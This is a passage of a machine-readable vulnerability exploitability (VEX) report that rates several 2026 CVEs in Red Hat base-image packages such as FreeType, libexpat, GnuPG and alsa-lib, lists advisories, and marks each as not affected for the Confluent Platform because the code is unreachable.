          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-23865",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "bitnami"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125
      ],
      "description": "An integer overflow in the tt_var_load_item_variation_store function of the Freetype library in versions 2.13.2 and 2.13.3 may allow for an out of bounds read operation when parsing HVAR/VVAR/MVAR tables in OpenType variable fonts. This issue is fixed in version 2.14.2.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-23865"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/03/03/8"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:9686"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:9693"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-23865"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418711"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438542"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2443891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448747"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460038"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460039"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460040"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460041"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460042"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460043"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460044"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460045"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66293"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22007"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22013"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22016"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22018"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22020"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22021"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23865"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25646"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26740"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34268"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34282"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-9693.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:9686"
        },
        {
          "url": "https://github.com/advisories/GHSA-878v-mxg6-vj8f"
        },
        {
          "url": "https://gitlab.com/freetype/freetype/-/commit/fc85a255849229c024c8e65f536fe1875d84841c"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-23865.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-9693.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23865"
        },
        {
          "url": "https://sourceforge.net/projects/freetype/files/freetype2/2.14.2"
        },
        {
          "url": "https://sourceforge.net/projects/freetype/files/freetype2/2.14.2/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8086-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8327-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8328-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8330-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8331-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8332-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8333-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8334-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8339-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8341-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-23865"
        },
        {
          "url": "https://www.facebook.com/security/advisories/cve-2026-23865"
        },
        {
          "url": "https://www.oracle.com/security-alerts/cpuapr2026.html#AppendixJAVA"
        }
      ],
      "published": "2026-03-02T17:16:32+00:00",
      "updated": "2026-06-17T10:22:13+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.10.4-10.el9_5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-24515",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 2.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 2.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        476
      ],
      "description": "In libexpat before 2.7.4, XML_ExternalEntityParserCreate does not copy unknown encoding handler user data.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-24515"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-24515"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-253495.html"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1131"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24515"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8022-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8022-2"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8023-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-24515"
        }
      ],
      "published": "2026-01-23T08:16:01+00:00",
      "updated": "2026-06-17T10:23:10+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.5.0-6.el9_8.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-24883",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        476
      ],
      "description": "In GnuPG before 2.5.17, a long signature packet length causes parse_signature to return success with sig->data[] set to a NULL value, leading to a denial of service (application crash).",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-24883"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-24883"
        },
        {
          "url": "https://dev.gnupg.org/T8049"
        },
        {
          "url": "https://github.com/advisories/GHSA-7246-cvp4-g68w"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24883"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-24883"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/01/27/8"
        }
      ],
      "published": "2026-01-27T19:16:16+00:00",
      "updated": "2026-06-17T10:23:44+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.3.3-5.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-25068",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        129
      ],
      "description": "alsa-lib versions 1.2.2 up to and including 1.2.15.2, prior to commit 5f7fe33, contain a heap-based buffer overflow in the topology mixer control decoder. The tplg_decode_control_mixer1() function reads the num_channels field from untrusted .tplg data and uses it as a loop bound without validating it against the fixed-size channel array (SND_TPLG_MAX_CHAN). A crafted topology file with an excessive num_channels value can cause out-of-bounds heap writes, leading to a crash.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-25068"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-25068"
        },
        {
          "url": "https://github.com/alsa-project/alsa-lib/commit/5f7fe33002d2d98d84f72e381ec2cccc0d5d3d40"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2026/02/msg00008.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25068"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8044-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8044-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-25068"
        },
        {
          "url": "https://www.vulncheck.com/advisories/alsa-lib-topology-decoder-heap-based-buffer-overflow"
        }
      ],
      "published": "2026-01-29T20:16:10+00:00",
      "updated": "2026-06-17T10:24:04+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/alsa-lib@1.2.15.3-1.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.2.15.3-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/alsa-lib@1.2.15.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/alsa-lib@1.2.15.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/alsa-lib@1.2.15.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/alsa-lib@1.2.15.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/alsa-lib@1.2.15.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/alsa-lib@1.2.15.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/alsa-lib@1.2.15.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/alsa-lib@1.2.15.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/alsa-lib@1.2.15.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/alsa-lib@1.2.15.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/alsa-lib@1.2.15.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/alsa-lib@1.2.15.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/alsa-lib@1.2.15.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/alsa-lib@1.2.15.3-1.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-25645",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
